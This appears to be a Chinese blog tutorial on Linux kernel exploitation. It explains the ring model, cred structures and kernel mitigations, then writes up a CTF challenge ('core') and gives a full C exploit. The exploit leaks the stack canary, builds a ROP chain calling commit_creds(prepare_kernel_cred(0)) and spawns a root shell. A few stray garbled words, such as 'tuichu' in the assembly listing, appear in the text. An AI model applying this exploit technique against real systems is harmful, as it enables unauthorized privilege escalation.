kernel-pwn入门学习

基础知识

Ring Model

intel CPU 将 CPU 的特权级别分为 4 个级别:Ring 0, Ring 1, Ring 2, Ring 3。

Ring0 只给 OS 使用,Ring 3 所有程序都可以使用,内层 Ring 可以随便使用外层 Ring 的资源。

使用 Ring Model 是为了提升系统安全性,例如某个间谍软件作为一个在 Ring 3 运行的用户程序,在不通知用户的时候打开摄像头会被阻止,因为访问硬件需要使用 being 驱动程序保留的 Ring 1 的方法。

大多数的现代操作系统只使用了 Ring 0 和 Ring 3。

内核模块

内核模块一般有驱动程序和内核扩展模块,Linux是单内核系统,需要模块机制来进行扩展和维护,一般CTF Kernel Pwn就是挖掘模块的漏洞。

insmod: 加载模块到内核

rmmod: 卸载模块

lsmod: 列出加载的模块

modprobe: 添加或删除模块

用户空间到内核空间

当发生 系统调用,产生异常,外设产生中断等事件时,会发生用户态到内核态的切换,具体的过程为:

  1. 通过swapgs切换 GS 段寄存器,将 GS 寄存器值和一个特定位置的值进行交换,目的是保存 GS 值,同时将该位置的值作为内核执行时的 GS 值使用。
  2. 将当前栈顶(用户空间栈顶)记录在 CPU 独占变量区域里,将 CPU 独占区域里记录的内核栈顶放入 rsp/esp。
  3. 通过 push 保存各寄存器值,具体的代码如下:
 ENTRY(entry_SYSCALL_64)
/* SWAPGS_UNSAFE_STACK是一个宏,x86直接定义为swapgs指令 */
SWAPGS_UNSAFE_STACK

/* 保存栈值,并设置内核栈 */
movq %rsp, PER_CPU_VAR(rsp_scratch)
movq PER_CPU_VAR(cpu_current_top_of_stack), %rsp


/* 通过push保存寄存器值,形成一个pt_regs结构 */
/* Construct struct pt_regs on stack */
pushq $__USER_DS /* pt_regs->ss */
pushq PER_CPU_VAR(rsp_scratch) /* pt_regs->sp */
pushq %r11 /* pt_regs->flags */
pushq $__USER_CS /* pt_regs->cs */
pushq %rcx /* pt_regs->ip */
pushq %rax /* pt_regs->orig_ax */
pushq %rdi /* pt_regs->di */
pushq %rsi /* pt_regs->si */
pushq %rdx /* pt_regs->dx */
pushq %rcx tuichu /* pt_regs->cx */
pushq $-ENOSYS /* pt_regs->ax */
pushq %r8 /* pt_regs->r8 */
pushq %r9 /* pt_regs->r9 */
pushq %r10 /* pt_regs->r10 */
pushq %r11 /* pt_regs->r11 */
sub $(6*8), %rsp /* pt_regs->bp, bx, r12-15 not saved */
  1. 通过汇编指令判断是否为 x32_abi。

  2. 通过系统调用号,跳到全局变量 sys_call_table 相应位置继续执行系统调用。

内核空间到用户空间

退出时,流程如下:

  1. 通过 swapgs 恢复 GS 值
  2. 通过 sysretq 或者 iretq 恢复到用户控件继续执行。如果使用 iretq 还需要给出用户空间的一些信息(CS, eflags/rflags, esp/rsp 等)

cred结构体

每个进程中都有一个 cred 结构,这个结构保存了该进程的权限等信息(uid,gid 等),如果能修改某个进程的 cred,那么也就修改了这个进程的权限。

struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
#ifdef CONFIG_KEYS
unsigned char jit_keyring; /* default keyring to attach requested
* keys to */
struct key __rcu *session_keyring; /* keyring inherited over fork */
struct key *process_keyring; /* keyring private to this process */
struct key *thread_keyring; /* keyring private to this thread */
struct key *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
void *security; /* subjective LSM security */
#endif
struct user_struct *user; /* real user ID subscription */
struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
struct group_info *group_info; /* supplementary groups for euid/fsgid */
struct rcu_head rcu; /* RCU deletion hook */
} __randomize_layout;

task_struct结构体

在内核中使用结构体 task_struct 表示一个进程,task_struct主要有以下的成员:

struct audit_context;
struct bio_list;
struct blk_plug;
struct bpf_local_storage;
struct bpf_run_ctx;
struct capture_control;
struct cfs_rq;
struct fs_struct;
struct futex_pi_state;
struct io_context;
struct io_uring_task;
struct mempolicy;
struct nameidata;
struct nsproxy;
struct perf_event_context;
struct pid_namespace;
struct pipe_inode_info;
struct rcu_node;
struct reclaim_state;
struct robust_list_head;
struct root_domain;
struct rq;
struct sched_attr;
struct seq_file;
struct sighand_struct;
struct signal_struct;
struct task_delay_info;
struct task_group;
struct user_event_mm;

源码链接:https://elixir.bootlin.com/linux/latest/source/include/linux/sched.h#L746

task_struct中有cred指针:

/* Process credentials: */

/* Tracer's credentials at attach: */
const struct cred __rcu *ptracer_cred;

/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;

/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;

要改变一个进程的cred结构体,就能改变其执行权限,在内核空间有如下两个函数,都位于kernel/cred.c中:

  • struct cred* prepare_kernel_cred(struct task_struct* daemon):该函数用以拷贝一个进程的cred结构体,并返回一个新的cred结构体,需要注意的是daemon参数应为有效的进程描述符地址或NULL,如果传入NULL,则会返回一个root权限的cred。
/**
* prepare_kernel_cred - Prepare a set of credentials for a kernel service
* @daemon: A userspace daemon to be used as a reference
*
* Prepare a set of credentials for a kernel service. This can then be used to
* override a task's own credentials so that work can be done on behalf of that
* task that requires a different subjective context.
*
* @daemon is used to provide a base cred, with the security data derived from
* that; if this is "&init_task", they'll be set to 0, no groups, full
* capabilities, and no keys.
*
* The caller may change these controls afterwards if desired.
*
* Returns the new credentials or NULL if out of memory.
*/
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
const struct cred *old;
struct cred *new;

if (WARN_ON_ONCE(!daemon))
return NULL;

new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
if (!new)
return NULL;

kdebug("prepare_kernel_cred() alloc %p", new);

old = get_task_cred(daemon);

*new = *old;
new->non_rcu = 0;
atomic_long_set(&new->usage, 1);
get_uid(new->user);
get_user_ns(new->user_ns);
get_group_info(new->group_info);

#ifdef CONFIG_KEYS
new->session_keyring = NULL;
new->process_keyring = NULL;
new->thread_keyring = NULL;
new->request_key_auth = NULL;
new->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
#endif

#ifdef CONFIG_SECURITY
new->security = NULL;
#endif
new->ucounts = get_ucounts(new->ucounts);
if (!new->ucounts)
goto error;

if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
goto error;

put_cred(old);
return new;

error:
put_cred(new);
put_cred(old);
return NULL;
}
EXPORT_SYMBOL(prepare_kernel_cred);
  • int commit_creds(struct cred *new):该函数用以将一个新的cred结构体应用到进程。内核态就需要调用commit_creds(prepare_kernel_cred(NULL))即可达成提权功能。
/**
* commit_creds - Install new credentials upon the current task
* @new: The credentials to be assigned
*
* Install a new set of credentials to the current task, using RCU to replace
* the old set. Both the objective and the subjective credentials pointers are
* updated. This function may not be called if the subjective credentials are
* in an overridden state.
*
* This function eats the caller's reference to the new credentials.
*
* Always returns 0 thus allowing this function to be tail-called at the end
* of, say, sys_setgid().
*/
int commit_creds(struct cred *new)
{
struct task_struct *task = current;
const struct cred *old = task->real_cred;

kdebug("commit_creds(%p{%ld})", new,
atomic_long_read(&new->usage));

BUG_ON(task->cred != old);
BUG_ON(atomic_long_read(&new->usage) < 1);

get_cred(new); /* we will require a ref for the subj creds too */

/* dumpability changes */
if (!uid_eq(old->euid, new->euid) ||
!gid_eq(old->egid, new->egid) ||
!uid_eq(old->fsuid, new->fsuid) ||
!gid_eq(old->fsgid, new->fsgid) ||
!cred_cap_issubset(old, new)) {
if (task->mm)
set_dumpable(task->mm, suid_dumpable);
task->pdeath_signal = 0;
/*
* If a task drops privileges and becomes nondumpable,
* the dumpability change must become visible before
* the credential change; otherwise, a __ptrace_may_access()
* racing with this change may be able to attach to a task it
* shouldn't be able to attach to (as if the task had dropped
* privileges without becoming nondumpable).
* Pairs with a read barrier in __ptrace_may_access().
*/
smp_wmb();
}

/* alter the thread keyring */
if (!uid_eq(new->fsuid, old->fsuid))
key_fsuid_changed(new);
if (!gid_eq(new->fsgid, old->fsgid))
key_fsgid_changed(new);

/* do it
* RLIMIT_NPROC limits on user->processes have already been checked
* in set_user().
*/
if (new->user != old->user || new->user_ns != old->user_ns)
inc_rlimit_ucounts(new->ucounts, UCOUNT_RLIMIT_NPROC, 1);
rcu_assign_pointer(task->real_cred, new);
rcu_assign_pointer(task->cred, new);
if (new->user != old->user || new->user_ns != old->user_ns)
dec_rlimit_ucounts(old->ucounts, UCOUNT_RLIMIT_NPROC, 1);

/* send notifications */
if (!uid_eq(new->uid, old->uid) ||
!uid_eq(new->euid, old->euid) ||
!uid_eq(new->suid, old->suid) ||
!uid_eq(new->fsuid, old->fsuid))
proc_id_connector(task, PROC_EVENT_UID);

if (!gid_eq(new->gid, old->gid) ||
!gid_eq(new->egid, old->egid) ||
!gid_eq(new->sgid, old->sgid) ||
!gid_eq(new->fsgid, old->fsgid))
proc_id_connector(task, PROC_EVENT_GID);

/* release the old obj and subj refs both */
put_cred_many(old, 2);
return 0;
}
EXPORT_SYMBOL(commit_creds);

保护措施

  1. KASLR

与用户态ASLR类似,在开启了 KASLR 的内核中,内核的代码段基地址等地址会整体偏移。

  1. FGKASLR

KASLR 虽然在一定程度上能够缓解攻击,但是若是攻击者通过一些信息泄露漏洞获取到内核中的某个地址,仍能够直接得知内核加载地址偏移从而得知整个内核地址布局,因此有研究者基于 KASLR 实现了 FGKASLR,以函数粒度重新排布内核代码。

  1. STACK PROTECTOR

类似于用户态程序的 canary,通常又被称作是 stack cookie,用以检测是否发生内核堆栈溢出,若是发生内核堆栈溢出则会产生 kernel panic。内核中的 canary 的值通常取自 gs 段寄存器某个固定偏移处的值。

  1. SMAP/SMEP

SMAP即管理模式访问保护(Supervisor Mode Access Prevention),SMEP即管理模式执行保护(Supervisor Mode Execution Prevention),这两种保护通常是同时开启的,用以阻止内核空间直接访问/执行用户空间的数据,完全地将内核空间与用户空间相分隔开,用以防范ret2usr(return-to-user,将内核空间的指令指针重定向至用户空间上构造好的提权代码)攻击。SMEP保护的绕过有以下两种方式:

  • 利用内核线性映射区对物理地址空间的完整映射,找到用户空间对应页框的内核空间地址,利用该内核地址完成对用户空间的访问(即一个内核空间地址与一个用户空间地址映射到了同一个页框上),这种攻击手法称为 ret2dir。
  • Intel下系统根据CR4控制寄存器的第20位标识是否开启SMEP保护(1为开启,0为关闭),若是能够通过kernel ROP改变CR4寄存器的值便能够关闭SMEP保护,完成SMEP-bypass,接下来就能够重新进行 ret2usr,但对于开启了 KPTI 的内核而言,内核页表的用户地址空间无执行权限,这使得 ret2usr 彻底成为过去式。

入门题目 - 强网杯core

题目附件解开后有如下文件:

root at mypwn in /ctf/work/kernel-pwn/core
$ ls
bzImage core.cpio start.sh vmlinux

start.sh如下:

qemu-system-x86_64 \
-m 64M \
-kernel ./bzImage \
-initrd ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \

开启了kaslr保护,需要泄露地址。还有要把内存改为128M,要不然可能跑不起来。

首先解压文件系统:

root at mypwn in /ctf/work/kernel-pwn/core
$ cpio -idm < ./core.cpio
cpio: vmlinux not created: newer or same age version exists
104379 blocks

root at mypwn in /ctf/work/kernel-pwn/core
$ ls
bin core.cpio etc init lib64 proc sbin sys usr
bzImage core.ko gen_cpio.sh lib linuxrc root start.sh tmp vmlinux

看下init脚本如下:

$ cat init
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
insmod /core.ko

poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

poweroff -d 0 -f

可以看到insmod了core.ko,而且把内核中所有用到的符号表给复制到了/tmp/kallsyms下面,并且还开了定时关机,我们本地调试的时候,需要把关机给取消了。

分析程序,发现开了canary和nx:

然后ioctl函数类似于一个菜单,有三个分支可进入:

可以看到core_read中有一个溢出点,其中off的值我们可以在别的分支进行控制:

core_write有一个大范围的溢出:

core_copy_func这里存在一个整数溢出:

思路:

  1. 通过ioctl设置off,然后通过core_read泄露canary
  2. 通过core_write写ROP链
  3. 通过core_copy_func进行栈溢出进行ROP,最终执行commit_creds(prepare_kernel_cred(0))

rop链的构造如下:

for(i = 0; i < 10; i++)
{
rop[i] = canary;
}
rop[i++] = 0xffffffff81000b2f + offset; // pop rdi; ret
rop[i++] = 0;
rop[i++] = prepare_kernel_cred; // prepare_kernel_cred(0)
rop[i++] = 0xffffffff810a0f49 + offset; // pop rdx; ret
rop[i++] = 0xffffffff81021e53 + offset; // pop rcx; ret
rop[i++] = 0xffffffff8101aa6a + offset; // mov rdi, rax; call rdx;
rop[i++] = commit_creds;
rop[i++] = 0xffffffff81a012da + offset; // swapgs; popfq; ret
rop[i++] = 0;
rop[i++] = 0xffffffff81050ac2 + offset; // iretq; ret;
rop[i++] = (size_t)spawn_shell; // rip
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

其中具体的偏移可以通过ropper查找。

exp如下:

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>
void spawn_shell()
{
if(!getuid())
{
system("/bin/sh");
}
else
{
puts("[*]spawn shell error!");
}
exit(0);
}

size_t commit_creds = 0, prepare_kernel_cred = 0;
size_t raw_vmlinux_base = 0xffffffff81000000;
size_t vmlinux_base = 0;
size_t find_symbols()
{
FILE* kallsyms_fd = fopen("/tmp/kallsyms", "r");
if(kallsyms_fd < 0)
{
puts("[*]open kallsyms error!");
exit(0);
}

char buf[0x30] = {0};
while(fgets(buf, 0x30, kallsyms_fd))
{
if(commit_creds & prepare_kernel_cred)
return 0;

if(strstr(buf, "commit_creds") && !commit_creds)
{
/* puts(buf); */
char hex[20] = {0};
strncpy(hex, buf, 16);
/* printf("hex: %s\n", hex); */
sscanf(hex, "%llx", &commit_creds);
printf("commit_creds addr: %p\n", commit_creds);
vmlinux_base = commit_creds - 0x9c8e0;
printf("vmlinux_base addr: %p\n", vmlinux_base);
}

if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
{
/* puts(buf); */
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &prepare_kernel_cred);
printf("prepare_kernel_cred addr: %p\n", prepare_kernel_cred);
vmlinux_base = prepare_kernel_cred - 0x9cce0;
/* printf("vmlinux_base addr: %p\n", vmlinux_base); */
}
}

if(!(prepare_kernel_cred & commit_creds))
{
puts("[*]Error!");
exit(0);
}

}

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}

void set_off(int fd, long long idx)
{
printf("[*]set off to %ld\n", idx);
ioctl(fd, 0x6677889C, idx);
}

void core_read(int fd, char *buf)
{
puts("[*]read to buf.");
ioctl(fd, 0x6677889B, buf);

}

void core_copy_func(int fd, long long size)
{
printf("[*]copy from user with size: %ld\n", size);
ioctl(fd, 0x6677889A, size);
}

int main()
{
save_status();
int fd = open("/proc/core", 2);
if(fd < 0)
{
puts("[*]open /proc/core error!");
exit(0);
}

find_symbols();
// gadget = raw_gadget - raw_vmlinux_base + vmlinux_base;
ssize_t offset = vmlinux_base - raw_vmlinux_base;

set_off(fd, 0x40);

char buf[0x40] = {0};
core_read(fd, buf);
size_t canary = ((size_t *)buf)[0];
printf("[+]canary: %p\n", canary);

size_t rop[0x1000] = {0};

int i;
for(i = 0; i < 10; i++)
{
rop[i] = canary;
}
rop[i++] = 0xffffffff81000b2f + offset; // pop rdi; ret
rop[i++] = 0;
rop[i++] = prepare_kernel_cred; // prepare_kernel_cred(0)

rop[i++] = 0xffffffff810a0f49 + offset; // pop rdx; ret
rop[i++] = 0xffffffff81021e53 + offset; // pop rcx; ret
rop[i++] = 0xffffffff8101aa6a + offset; // mov rdi, rax; call rdx;
rop[i++] = commit_creds;

rop[i++] = 0xffffffff81a012da + offset; // swapgs; popfq; ret
rop[i++] = 0;

rop[i++] = 0xffffffff81050ac2 + offset; // iretq; ret;

rop[i++] = (size_t)spawn_shell; // rip

rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x800);
core_copy_func(fd, 0xffffffffffff0000 | (0x100));
return 0;
}

成功提权:

文章作者: Alex
文章链接: http://example.com/2024/02/11/kernal-pwn学习/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Alex's blog~